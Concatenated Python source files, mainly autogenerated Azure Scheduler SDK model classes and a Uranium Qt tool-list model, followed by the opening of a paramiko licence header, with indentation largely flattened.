self,
**kwargs
):
super(JobCollectionDefinition, self).__init__(**kwargs)
self.id = None
self.type = None
self.name = kwargs.get('name', None)
self.location = kwargs.get('location', None)
self.tags = kwargs.get('tags', None)
self.properties = kwargs.get('properties', None)
class JobCollectionListResult(msrest.serialization.Model):
"""JobCollectionListResult.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: Gets the job collections.
:vartype value: list[~azure.mgmt.scheduler.models.JobCollectionDefinition]
:param next_link: Gets or sets the URL to get the next set of job collections.
:type next_link: str
"""
_validation = {
'value': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[JobCollectionDefinition]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(JobCollectionListResult, self).__init__(**kwargs)
self.value = None
self.next_link = kwargs.get('next_link', None)
class JobCollectionProperties(msrest.serialization.Model):
"""JobCollectionProperties.
:param sku: Gets or sets the SKU.
:type sku: ~azure.mgmt.scheduler.models.Sku
:param state: Gets or sets the state. Possible values include: "Enabled", "Disabled",
"Suspended", "Deleted".
:type state: str or ~azure.mgmt.scheduler.models.JobCollectionState
:param quota: Gets or sets the job collection quota.
:type quota: ~azure.mgmt.scheduler.models.JobCollectionQuota
"""
_attribute_map = {
'sku': {'key': 'sku', 'type': 'Sku'},
'state': {'key': 'state', 'type': 'str'},
'quota': {'key': 'quota', 'type': 'JobCollectionQuota'},
}
def __init__(
self,
**kwargs
):
super(JobCollectionProperties, self).__init__(**kwargs)
self.sku = kwargs.get('sku', None)
self.state = kwargs.get('state', None)
self.quota = kwargs.get('quota', None)
class JobCollectionQuota(msrest.serialization.Model):
"""JobCollectionQuota.
    :param max_job_count: Gets or sets the maximum job count.
:type max_job_count: int
:param max_job_occurrence: Gets or sets the maximum job occurrence.
:type max_job_occurrence: int
    :param max_recurrence: Gets or sets the maximum recurrence.
:type max_recurrence: ~azure.mgmt.scheduler.models.JobMaxRecurrence
"""
_attribute_map = {
'max_job_count': {'key': 'maxJobCount', 'type': 'int'},
'max_job_occurrence': {'key': 'maxJobOccurrence', 'type': 'int'},
'max_recurrence': {'key': 'maxRecurrence', 'type': 'JobMaxRecurrence'},
}
def __init__(
self,
**kwargs
):
super(JobCollectionQuota, self).__init__(**kwargs)
self.max_job_count = kwargs.get('max_job_count', None)
self.max_job_occurrence = kwargs.get('max_job_occurrence', None)
self.max_recurrence = kwargs.get('max_recurrence', None)
class JobDefinition(msrest.serialization.Model):
"""JobDefinition.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Gets the job resource identifier.
:vartype id: str
:ivar type: Gets the job resource type.
:vartype type: str
:ivar name: Gets the job resource name.
:vartype name: str
:param properties: Gets or sets the job properties.
:type properties: ~azure.mgmt.scheduler.models.JobProperties
"""
_validation = {
'id': {'readonly': True},
'type': {'readonly': True},
'name': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'JobProperties'},
}
def __init__(
self,
**kwargs
):
super(JobDefinition, self).__init__(**kwargs)
self.id = None
self.type = None
self.name = None
self.properties = kwargs.get('properties', None)
class JobErrorAction(msrest.serialization.Model):
"""JobErrorAction.
:param type: Gets or sets the job error action type. Possible values include: "Http", "Https",
"StorageQueue", "ServiceBusQueue", "ServiceBusTopic".
:type type: str or ~azure.mgmt.scheduler.models.JobActionType
:param request: Gets or sets the http requests.
:type request: ~azure.mgmt.scheduler.models.HttpRequest
:param queue_message: Gets or sets the storage queue message.
:type queue_message: ~azure.mgmt.scheduler.models.StorageQueueMessage
:param service_bus_queue_message: Gets or sets the service bus queue message.
:type service_bus_queue_message: ~azure.mgmt.scheduler.models.ServiceBusQueueMessage
:param service_bus_topic_message: Gets or sets the service bus topic message.
:type service_bus_topic_message: ~azure.mgmt.scheduler.models.ServiceBusTopicMessage
:param retry_policy: Gets or sets the retry policy.
:type retry_policy: ~azure.mgmt.scheduler.models.RetryPolicy
"""
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'request': {'key': 'request', 'type': 'HttpRequest'},
'queue_message': {'key': 'queueMessage', 'type': 'StorageQueueMessage'},
'service_bus_queue_message': {'key': 'serviceBusQueueMessage', 'type': 'ServiceBusQueueMessage'},
'service_bus_topic_message': {'key': 'serviceBusTopicMessage', 'type': 'ServiceBusTopicMessage'},
'retry_policy': {'key': 'retryPolicy', 'type': 'RetryPolicy'},
}
def __init__(
self,
**kwargs
):
super(JobErrorAction, self).__init__(**kwargs)
self.type = kwargs.get('type', None)
self.request = kwargs.get('request', None)
self.queue_message = kwargs.get('queue_message', None)
self.service_bus_queue_message = kwargs.get('service_bus_queue_message', None)
self.service_bus_topic_message = kwargs.get('service_bus_topic_message', None)
self.retry_policy = kwargs.get('retry_policy', None)
class JobHistoryDefinition(msrest.serialization.Model):
"""JobHistoryDefinition.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Gets the job history identifier.
:vartype id: str
:ivar type: Gets the job history resource type.
:vartype type: str
:ivar name: Gets the job history name.
:vartype name: str
:ivar properties: Gets or sets the job history properties.
:vartype properties: ~azure.mgmt.scheduler.models.JobHistoryDefinitionProperties
"""
_validation = {
'id': {'readonly': True},
'type': {'readonly': True},
'name': {'readonly': True},
'properties': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'JobHistoryDefinitionProperties'},
}
def __init__(
self,
**kwargs
):
super(JobHistoryDefinition, self).__init__(**kwargs)
self.id = None
self.type = None
self.name = None
self.properties = None
class JobHistoryDefinitionProperties(msrest.serialization.Model):
"""JobHistoryDefinitionProperties.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar start_time: Gets the start time for this job.
:vartype start_time: ~datetime.datetime
:ivar end_time: Gets the end time for this job.
:vartype end_time: ~datetime.datetime
:ivar expected_execution_time: Gets the expected execution time for this job.
:vartype expected_execution_time: ~datetime.datetime
:ivar action_name: Gets the job history action name. Possible values include: "MainAction",
"ErrorAction".
:vartype action_name: str or ~azure.mgmt.scheduler.models.JobHistoryActionName
:ivar status: Gets the job history status. Possible values include: "Completed", "Failed",
"Postponed".
:vartype status: str or ~azure.mgmt.scheduler.models.JobExecutionStatus
:ivar message: Gets the message for the job history.
:vartype message: str
:ivar retry_count: Gets the retry count for job.
:vartype retry_count: int
:ivar repeat_count: Gets the repeat count for the job.
:vartype repeat_count: int
"""
_validation = {
'start_time': {'readonly': True},
'end_time': {'readonly': True},
'expected_execution_time': {'readonly': True},
'action_name': {'readonly': True},
'status': {'readonly': True},
'message': {'readonly': True},
'retry_count': {'readonly': True},
'repeat_count': {'readonly': True},
}
_attribute_map = {
'start_time': {'key': 'startTime', 'type': 'iso-8601'},
'end_time': {'key': 'endTime', 'type': 'iso-8601'},
'expected_execution_time': {'key': 'expectedExecutionTime', 'type': 'iso-8601'},
'action_name': {'key': 'actionName', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'retry_count': {'key': 'retryCount', 'type': 'int'},
'repeat_count': {'key': 'repeatCount', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(JobHistoryDefinitionProperties, self).__init__(**kwargs)
self.start_time = None
self.end_time = None
self.expected_execution_time = None
self.action_name = None
self.status = None
self.message = None
self.retry_count = None
self.repeat_count = None
class JobHistoryFilter(msrest.serialization.Model):
"""JobHistoryFilter.
:param status: Gets or sets the job execution status. Possible values include: "Completed",
"Failed", "Postponed".
:type status: str or ~azure.mgmt.scheduler.models.JobExecutionStatus
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(JobHistoryFilter, self).__init__(**kwargs)
self.status = kwargs.get('status', None)
class JobHistoryListResult(msrest.serialization.Model):
"""JobHistoryListResult.
:param value: Gets or sets the job histories under job.
:type value: list[~azure.mgmt.scheduler.models.JobHistoryDefinition]
:param next_link: Gets or sets the URL to get the next set of job histories.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[JobHistoryDefinition]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(JobHistoryListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class JobListResult(msrest.serialization.Model):
"""JobListResult.
:param value: Gets or sets all jobs under job collection.
:type value: list[~azure.mgmt.scheduler.models.JobDefinition]
:param next_link: Gets or sets the URL to get the next set of jobs.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[JobDefinition]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(JobListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class JobMaxRecurrence(msrest.serialization.Model):
"""JobMaxRecurrence.
:param frequency: Gets or sets the frequency of recurrence (second, minute, hour, day, week,
month). Possible values include: "Minute", "Hour", "Day", "Week", "Month".
:type frequency: str or ~azure.mgmt.scheduler.models.RecurrenceFrequency
:param interval: Gets or sets the interval between retries.
:type interval: int
"""
_attribute_map = {
'frequency': {'key': 'frequency', 'type': 'str'},
'interval': {'key': 'interval', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(JobMaxRecurrence, self).__init__(**kwargs)
self.frequency = kwargs.get('frequency', None)
self.interval = kwargs.get('interval', None)
class JobProperties(msrest.serialization.Model):
"""JobProperties.
Variables are only populated by the server, and will be ignored when sending a request.
:param start_time: Gets or sets the job start time.
:type start_time: ~datetime.datetime
:param action: Gets or sets the job action.
:type action: ~azure.mgmt.scheduler.models.JobAction
:param recurrence: Gets or sets the job recurrence.
:type recurrence: ~azure.mgmt.scheduler.models.JobRecurrence
    :param state: Gets or sets the job state. Possible values include: "Enabled", "Disabled",
"Faulted", "Completed".
:type state: str or ~azure.mgmt.scheduler.models.JobState
:ivar status: Gets the job status.
:vartype status: ~azure.mgmt.scheduler.models.JobStatus
"""
_validation = {
'status': {'readonly': True},
}
_attribute_map = {
'start_time': {'key': 'startTime', 'type': 'iso-8601'},
'action': {'key': 'action', 'type': 'JobAction'},
'recurrence': {'key': 'recurrence', 'type': 'JobRecurrence'},
'state': {'key': 'state', 'type': 'str'},
'status': {'key': 'status', 'type': 'JobStatus'},
}
def __init__(
self,
**kwargs
):
super(JobProperties, self).__init__(**kwargs)
self.start_time = kwargs.get('start_time', None)
self.action = kwargs.get('action', None)
self.recurrence = kwargs.get('recurrence', None)
self.state = kwargs.get('state', None)
self.status = None
class JobRecurrence(msrest.serialization.Model):
"""JobRecurrence.
:param frequency: Gets or sets the frequency of recurrence (second, minute, hour, day, week,
month). Possible values include: "Minute", "Hour", "Day", "Week", "Month".
:type frequency: str or ~azure.mgmt.scheduler.models.RecurrenceFrequency
:param interval: Gets or sets the interval between retries.
:type interval: int
:param count: Gets or sets the maximum number of times that the job should run.
:type count: int
:param end_time: Gets or sets the time at which the job will complete.
:type end_time: ~datetime.datetime
:param schedule:
:type schedule: ~azure.mgmt.scheduler.models.JobRecurrenceSchedule
"""
_attribute_map = {
'frequency': {'key': 'frequency', 'type': 'str'},
'interval': {'key': 'interval', 'type': 'int'},
'count': {'key': 'count', 'type': 'int'},
'end_time': {'key': 'endTime', 'type': 'iso-8601'},
'schedule': {'key': 'schedule', 'type': 'JobRecurrenceSchedule'},
}
def __init__(
self,
**kwargs
):
super(JobRecurrence, self).__init__(**kwargs)
self.frequency = kwargs.get('frequency', None)
self.interval = kwargs.get('interval', None)
self.count = kwargs.get('count', None)
self.end_time = kwargs.get('end_time', None)
self.schedule = kwargs.get('schedule', None)
class JobRecurrenceSchedule(msrest.serialization.Model):
"""JobRecurrenceSchedule.
:param week_days: Gets or sets the days of the week that the job should execute on.
:type week_days: list[str or ~azure.mgmt.scheduler.models.DayOfWeek]
:param hours: Gets or sets the hours of the day that the job should execute at.
:type hours: list[int]
:param minutes: Gets or sets the minutes of the hour that the job should execute at.
:type minutes: list[int]
:param month_days: Gets or sets the days of the month that the job should execute on. Must be
between 1 and 31.
:type month_days: list[int]
:param monthly_occurrences: Gets or sets the occurrences of days within a month.
:type monthly_occurrences:
list[~azure.mgmt.scheduler.models.JobRecurrenceScheduleMonthlyOccurrence]
"""
_attribute_map = {
'week_days': {'key': 'weekDays', 'type': '[str]'},
'hours': {'key': 'hours', 'type': '[int]'},
'minutes': {'key': 'minutes', 'type': '[int]'},
'month_days': {'key': 'monthDays', 'type': '[int]'},
'monthly_occurrences': {'key': 'monthlyOccurrences', 'type': '[JobRecurrenceScheduleMonthlyOccurrence]'},
}
def __init__(
self,
**kwargs
):
super(JobRecurrenceSchedule, self).__init__(**kwargs)
self.week_days = kwargs.get('week_days', None)
self.hours = kwargs.get('hours', None)
self.minutes = kwargs.get('minutes', None)
self.month_days = kwargs.get('month_days', None)
self.monthly_occurrences = kwargs.get('monthly_occurrences', None)
class JobRecurrenceScheduleMonthlyOccurrence(msrest.serialization.Model):
"""JobRecurrenceScheduleMonthlyOccurrence.
:param day: Gets or sets the day. Must be one of monday, tuesday, wednesday, thursday, friday,
saturday, sunday. Possible values include: "Monday", "Tuesday", "Wednesday", "Thursday",
"Friday", "Saturday", "Sunday".
:type day: str or ~azure.mgmt.scheduler.models.JobScheduleDay
:param occurrence: Gets or sets the occurrence. Must be between -5 and 5.
:type occurrence: int
"""
_attribute_map = {
'day': {'key': 'day', 'type': 'str'},
'occurrence': {'key': 'Occurrence', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(JobRecurrenceScheduleMonthlyOccurrence, self).__init__(**kwargs)
self.day = kwargs.get('day', None)
self.occurrence = kwargs.get('occurrence', None)
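# Illustrative sketch (not part of the generated code): a weekly recurrence
# built from the schedule models above. The specific days, times and counts
# are placeholder values chosen for the example.
def _example_weekly_recurrence():
    return JobRecurrence(
        frequency='Week',
        interval=1,
        count=10,
        schedule=JobRecurrenceSchedule(week_days=['Monday', 'Friday'], hours=[9], minutes=[0]),
    )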
class JobStateFilter(msrest.serialization.Model):
"""JobStateFilter.
:param state: Gets or sets the job state. Possible values include: "Enabled", "Disabled",
"Faulted", "Completed".
:type state: str or ~azure.mgmt.scheduler.models.JobState
"""
_attribute_map = {
'state': {'key': 'state', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(JobStateFilter, self).__init__(**kwargs)
self.state = kwargs.get('state', None)
class JobStatus(msrest.serialization.Model):
"""JobStatus.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar execution_count: Gets the number of times this job has executed.
:vartype execution_count: int
:ivar failure_count: Gets the number of times this job has failed.
:vartype failure_count: int
:ivar faulted_count: Gets the number of faulted occurrences (occurrences that were retried and
failed as many times as the retry policy states).
:vartype faulted_count: int
:ivar last_execution_time: Gets the time the last occurrence executed in ISO-8601 format.
Could be empty if job has not run yet.
:vartype last_execution_time: ~datetime.datetime
:ivar next_execution_time: Gets the time of the next occurrence in ISO-8601 format. Could be
empty if the job is completed.
:vartype next_execution_time: ~datetime.datetime
"""
_validation = {
'execution_count': {'readonly': True},
'failure_count': {'readonly': True},
'faulted_count': {'readonly': True},
'last_execution_time': {'readonly': True},
'next_execution_time': {'readonly': True},
}
_attribute_map = {
'execution_count': {'key': 'executionCount', 'type': 'int'},
'failure_count': {'key': 'failureCount', 'type': 'int'},
'faulted_count': {'key': 'faultedCount', 'type': 'int'},
'last_execution_time': {'key': 'lastExecutionTime', 'type': 'iso-8601'},
'next_execution_time': {'key': 'nextExecutionTime', 'type': 'iso-8601'},
}
def __init__(
self,
**kwargs
):
super(JobStatus, self).__init__(**kwargs)
self.execution_count = None
self.failure_count = None
self.faulted_count = None
self.last_execution_time = None
self.next_execution_time = None
class OAuthAuthentication(HttpAuthentication):
"""OAuthAuthentication.
All required parameters must be populated in order to send to Azure.
    :param type: Required. Gets or sets the HTTP authentication type. Constant filled by server.
Possible values include: "NotSpecified", "ClientCertificate", "ActiveDirectoryOAuth", "Basic".
:type type: str or ~azure.mgmt.scheduler.models.HttpAuthenticationType
:param secret: Gets or sets the secret, return value will always be empty.
:type secret: str
:param tenant: Gets or sets the tenant.
:type tenant: str
:param audience: Gets or sets the audience.
:type audience: str
:param client_id: Gets or sets the client identifier.
:type client_id: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'secret': {'key': 'secret', 'type': 'str'},
'tenant': {'key': 'tenant', 'type': 'str'},
'audience': {'key': 'audience', 'type': 'str'},
'client_id': {'key': 'clientId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(OAuthAuthentication, self).__init__(**kwargs)
self.type = 'ActiveDirectoryOAuth' # type: str
self.secret = kwargs.get('secret', None)
self.tenant = kwargs.get('tenant', None)
self.audience = kwargs.get('audience', None)
self.client_id = kwargs.get('client_id', None)
class RetryPolicy(msrest.serialization.Model):
"""RetryPolicy.
:param retry_type: Gets or sets the retry strategy to be used. Possible values include: "None",
"Fixed".
:type retry_type: str or ~azure.mgmt.scheduler.models.RetryType
:param retry_interval: Gets or sets the retry interval between retries, specify duration in ISO
8601 format.
:type retry_interval: ~datetime.timedelta
:param retry_count: Gets or sets the number of times a retry should be attempted.
:type retry_count: int
"""
_attribute_map = {
'retry_type': {'key': 'retryType', 'type': 'str'},
'retry_interval': {'key': 'retryInterval', 'type': 'duration'},
'retry_count': {'key': 'retryCount', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(RetryPolicy, self).__init__(**kwargs)
self.retry_type = kwargs.get('retry_type', None)
self.retry_interval = kwargs.get('retry_interval', None)
self.retry_count = kwargs.get('retry_count', None)
class ServiceBusAuthentication(msrest.serialization.Model):
"""ServiceBusAuthentication.
:param sas_key: Gets or sets the SAS key.
:type sas_key: str
:param sas_key_name: Gets or sets the SAS key name.
:type sas_key_name: str
:param type: Gets or sets the authentication type. Possible values include: "NotSpecified",
"SharedAccessKey".
:type type: str or ~azure.mgmt.scheduler.models.ServiceBusAuthenticationType
"""
_attribute_map = {
'sas_key': {'key': 'sasKey', 'type': 'str'},
'sas_key_name': {'key': 'sasKeyName', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ServiceBusAuthentication, self).__init__(**kwargs)
self.sas_key = kwargs.get('sas_key', None)
self.sas_key_name = kwargs.get('sas_key_name', None)
self.type = kwargs.get('type', None)
class ServiceBusBrokeredMessageProperties(msrest.serialization.Model):
"""ServiceBusBrokeredMessageProperties.
:param content_type: Gets or sets the content type.
:type content_type: str
:param correlation_id: Gets or sets the correlation ID.
:type correlation_id: str
:param force_persistence: Gets or sets the force persistence.
:type force_persistence: bool
:param label: Gets or sets the label.
:type label: str
:param message_id: Gets or sets the message ID.
:type message_id: str
:param partition_key: Gets or sets the partition key.
:type partition_key: str
:param reply_to: Gets or sets the reply to.
:type reply_to: str
:param reply_to_session_id: Gets or sets the reply to session ID.
:type reply_to_session_id: str
:param scheduled_enqueue_time_utc: Gets or sets the scheduled enqueue time UTC.
:type scheduled_enqueue_time_utc: ~datetime.datetime
:param session_id: Gets or sets the session ID.
:type session_id: str
:param time_to_live: Gets or sets the time to live.
:type time_to_live: ~datetime.timedelta
:param to: Gets or sets the to.
:type to: str
:param via_partition_key: Gets or sets the via partition key.
:type via_partition_key: str
"""
_attribute_map = {
'content_type': {'key': 'contentType', 'type': 'str'},
'correlation_id': {'key': 'correlationId', 'type': 'str'},
'force_persistence': {'key': 'forcePersistence', 'type': 'bool'},
'label': {'key': 'label', 'type': 'str'},
'message_id': {'key': 'messageId', 'type': 'str'},
'partition_key': {'key': 'partitionKey', 'type': 'str'},
'reply_to': {'key': 'replyTo', 'type': 'str'},
'reply_to_session_id': {'key': 'replyToSessionId', 'type': 'str'},
'scheduled_enqueue_time_utc': {'key': 'scheduledEnqueueTimeUtc', 'type': 'iso-8601'},
'session_id': {'key': 'sessionId', 'type': 'str'},
'time_to_live': {'key': 'timeToLive', 'type': 'duration'},
'to': {'key': 'to', 'type': 'str'},
'via_partition_key': {'key': 'viaPartitionKey', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ServiceBusBrokeredMessageProperties, self).__init__(**kwargs)
self.content_type = kwargs.get('content_type', None)
self.correlation_id = kwargs.get('correlation_id', None)
self.force_persistence = kwargs.get('force_persistence', None)
self.label = kwargs.get('label', None)
self.message_id = kwargs.get('message_id', None)
self.partition_key = kwargs.get('partition_key', None)
self.reply_to = kwargs.get('reply_to', None)
self.reply_to_session_id = kwargs.get('reply_to_session_id', None)
self.scheduled_enqueue_time_utc = kwargs.get('scheduled_enqueue_time_utc', None)
self.session_id = kwargs.get('session_id', None)
self.time_to_live = kwargs.get('time_to_live', None)
self.to = kwargs.get('to', None)
self.via_partition_key = kwargs.get('via_partition_key', None)
class ServiceBusMessage(msrest.serialization.Model):
"""ServiceBusMessage.
:param authentication: Gets or sets the Service Bus authentication.
:type authentication: ~azure.mgmt.scheduler.models.ServiceBusAuthentication
:param brokered_message_properties: Gets or sets the brokered message properties.
:type brokered_message_properties:
~azure.mgmt.scheduler.models.ServiceBusBrokeredMessageProperties
:param custom_message_properties: Gets or sets the custom message properties.
:type custom_message_properties: dict[str, str]
:param message: Gets or sets the message.
:type message: str
:param namespace: Gets or sets the namespace.
:type namespace: str
:param transport_type: Gets or sets the transport type. Possible values include:
"NotSpecified", "NetMessaging", "AMQP".
:type transport_type: str or ~azure.mgmt.scheduler.models.ServiceBusTransportType
"""
_attribute_map = {
'authentication': {'key': 'authentication', 'type': 'ServiceBusAuthentication'},
'brokered_message_properties': {'key': 'brokeredMessageProperties', 'type': 'ServiceBusBrokeredMessageProperties'},
'custom_message_properties': {'key': 'customMessageProperties', 'type': '{str}'},
'message': {'key': 'message', 'type': 'str'},
'namespace': {'key': 'namespace', 'type': 'str'},
'transport_type': {'key': 'transportType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ServiceBusMessage, self).__init__(**kwargs)
self.authentication = kwargs.get('authentication', None)
self.brokered_message_properties = kwargs.get('brokered_message_properties', None)
self.custom_message_properties = kwargs.get('custom_message_properties', None)
self.message = kwargs.get('message', None)
self.namespace = kwargs.get('namespace', None)
self.transport_type = kwargs.get('transport_type', None)
class ServiceBusQueueMessage(ServiceBusMessage):
"""ServiceBusQueueMessage.
:param authentication: Gets or sets the Service Bus authentication.
:type authentication: ~azure.mgmt.scheduler.models.ServiceBusAuthentication
:param brokered_message_properties: Gets or sets the brokered message properties.
:type brokered_message_properties:
~azure.mgmt.scheduler.models.ServiceBusBrokeredMessageProperties
:param custom_message_properties: Gets or sets the custom message properties.
:type custom_message_properties: dict[str, str]
:param message: Gets or sets the message.
:type message: str
:param namespace: Gets or sets the namespace.
:type namespace: str
:param transport_type: Gets or sets the transport type. Possible values include:
"NotSpecified", "NetMessaging", "AMQP".
:type transport_type: str or ~azure.mgmt.scheduler.models.ServiceBusTransportType
:param queue_name: Gets or sets the queue name.
:type queue_name: str
"""
_attribute_map = {
'authentication': {'key': 'authentication', 'type': 'ServiceBusAuthentication'},
'brokered_message_properties': {'key': 'brokeredMessageProperties', 'type': 'ServiceBusBrokeredMessageProperties'},
'custom_message_properties': {'key': 'customMessageProperties', 'type': '{str}'},
'message': {'key': 'message', 'type': 'str'},
'namespace': {'key': 'namespace', 'type': 'str'},
'transport_type': {'key': 'transportType', 'type': 'str'},
'queue_name': {'key': 'queueName', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ServiceBusQueueMessage, self).__init__(**kwargs)
self.queue_name = kwargs.get('queue_name', None)
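# Illustrative sketch (not part of the generated code): a Service Bus queue
# message with shared-access-key authentication. The namespace, queue name and
# key values are placeholders.
def _example_service_bus_queue_message():
    return ServiceBusQueueMessage(
        authentication=ServiceBusAuthentication(
            type='SharedAccessKey', sas_key_name='RootManageSharedAccessKey', sas_key='<key>'),
        namespace='example-namespace',
        queue_name='example-queue',
        message='hello',
        transport_type='AMQP',
    )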
class ServiceBusTopicMessage(ServiceBusMessage):
"""ServiceBusTopicMessage.
:param authentication: Gets or sets the Service Bus authentication.
:type authentication: ~azure.mgmt.scheduler.models.ServiceBusAuthentication
:param brokered_message_properties: Gets or sets the brokered message properties.
:type brokered_message_properties:
~azure.mgmt.scheduler.models.ServiceBusBrokeredMessageProperties
:param custom_message_properties: Gets or sets the custom message properties.
:type custom_message_properties: dict[str, str]
:param message: Gets or sets the message.
:type message: str
:param namespace: Gets or sets the namespace.
:type namespace: str
:param transport_type: Gets or sets the transport type. Possible values include:
"NotSpecified", "NetMessaging", "AMQP".
:type transport_type: str or ~azure.mgmt.scheduler.models.ServiceBusTransportType
:param topic_path: Gets or sets the topic path.
:type topic_path: str
"""
_attribute_map = {
'authentication': {'key': 'authentication', 'type': 'ServiceBusAuthentication'},
'brokered_message_properties': {'key': 'brokeredMessageProperties', 'type': 'ServiceBusBrokeredMessageProperties'},
'custom_message_properties': {'key': 'customMessageProperties', 'type': '{str}'},
'message': {'key': 'message', 'type': 'str'},
'namespace': {'key': 'namespace', 'type': 'str'},
'transport_type': {'key': 'transportType', 'type': 'str'},
'topic_path': {'key': 'topicPath', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ServiceBusTopicMessage, self).__init__(**kwargs)
self.topic_path = kwargs.get('topic_path', None)
class Sku(msrest.serialization.Model):
"""Sku.
    :param name: Gets or sets the SKU. Possible values include: "Standard", "Free", "P10Premium",
"P20Premium".
:type name: str or ~azure.mgmt.scheduler.models.SkuDefinition
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Sku, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
class StorageQueueMessage(msrest.serialization.Model):
"""StorageQueueMessage.
:param storage_account: Gets or sets the storage account name.
:type storage_account: str
:param queue_name: Gets or sets the queue name.
:type queue_name: str
:param sas_token: Gets or sets the SAS key.
:type sas_token: str
:param message: Gets or sets the message.
:type message: str
"""
_attribute_map = {
'storage_account': {'key': 'storageAccount', 'type': 'str'},
'queue_name': {'key': 'queueName', 'type': 'str'},
'sas_token': {'key': 'sasToken', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(StorageQueueMessage, self).__init__(**kwargs)
self.storage_account = kwargs.get('storage_account', None)
self.queue_name = kwargs.get('queue_name', None)
self.sas_token = kwargs.get('sas_token', None)
self.message = kwargs.get('message', None)
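# Illustrative sketch (not part of the generated code): composing a full job
# definition from the models above -- an HTTP action with a fixed retry policy
# and an hourly recurrence. All literal values are placeholders.
def _example_job_definition():
    action = JobAction(
        type='Https',
        request=HttpRequest(uri='https://example.invalid/run', method='POST'),
        retry_policy=RetryPolicy(retry_type='Fixed', retry_count=3),
    )
    recurrence = JobRecurrence(frequency='Hour', interval=1)
    return JobDefinition(
        properties=JobProperties(action=action, recurrence=recurrence, state='Enabled'))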
| Azure/azure-sdk-for-python | sdk/scheduler/azure-mgmt-scheduler/azure/mgmt/scheduler/models/_models.py | Python | mit | 43,628 |
# Copyright (c) 2017 Ultimaker B.V.
# Uranium is released under the terms of the LGPLv3 or higher.
from PyQt5.QtCore import Qt
from UM.Application import Application
from UM.Qt.ListModel import ListModel
from UM.PluginRegistry import PluginRegistry
class ToolModel(ListModel):
IdRole = Qt.UserRole + 1
NameRole = Qt.UserRole + 2
IconRole = Qt.UserRole + 3
ToolActiveRole = Qt.UserRole + 4
ToolEnabledRole = Qt.UserRole + 5
DescriptionRole = Qt.UserRole + 6
LocationRole = Qt.UserRole + 7
def __init__(self, parent = None):
super().__init__(parent)
self._controller = Application.getInstance().getController()
self._controller.toolsChanged.connect(self._onToolsChanged)
self._controller.toolEnabledChanged.connect(self._onToolEnabledChanged)
self._controller.activeToolChanged.connect(self._onActiveToolChanged)
self._onToolsChanged()
self.addRoleName(self.IdRole, "id")
self.addRoleName(self.NameRole, "name")
self.addRoleName(self.IconRole, "icon")
self.addRoleName(self.ToolActiveRole, "active")
self.addRoleName(self.ToolEnabledRole, "enabled")
self.addRoleName(self.DescriptionRole, "description")
self.addRoleName(self.LocationRole, "location")
def _onToolsChanged(self):
items = []
tools = self._controller.getAllTools()
for name in tools:
tool_meta_data = PluginRegistry.getInstance().getMetaData(name).get("tool", {})
location = PluginRegistry.getInstance().getMetaData(name).get("location", "")
# Skip tools that are marked as not visible
if "visible" in tool_meta_data and not tool_meta_data["visible"]:
continue
# Optional metadata elements
description = tool_meta_data.get("description", "")
icon_name = tool_meta_data.get("icon", "default.png")
weight = tool_meta_data.get("weight", 0)
enabled = self._controller.getTool(name).getEnabled()
items.append({
"id": name,
"name": tool_meta_data.get("name", name),
"icon": icon_name,
"location": location,
"active": False,
"enabled": enabled,
"description": description,
"weight": weight
})
items.sort(key = lambda t: t["weight"])
self.setItems(items)
def _onActiveToolChanged(self):
active_tool = self._controller.getActiveTool()
for index, value in enumerate(self.items):
if self._controller.getTool(value["id"]) == active_tool:
self.setProperty(index, "active", True)
else:
self.setProperty(index, "active", False)
def _onToolEnabledChanged(self, tool_id, enabled):
index = self.find("id", tool_id)
if index >= 0:
self.setProperty(index, "enabled", enabled)
| thopiekar/Uranium | UM/Qt/Bindings/ToolModel.py | Python | lgpl-3.0 | 3,001 |
# Copyright (C) 2003-2007 Robey Pointer <[email protected]>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
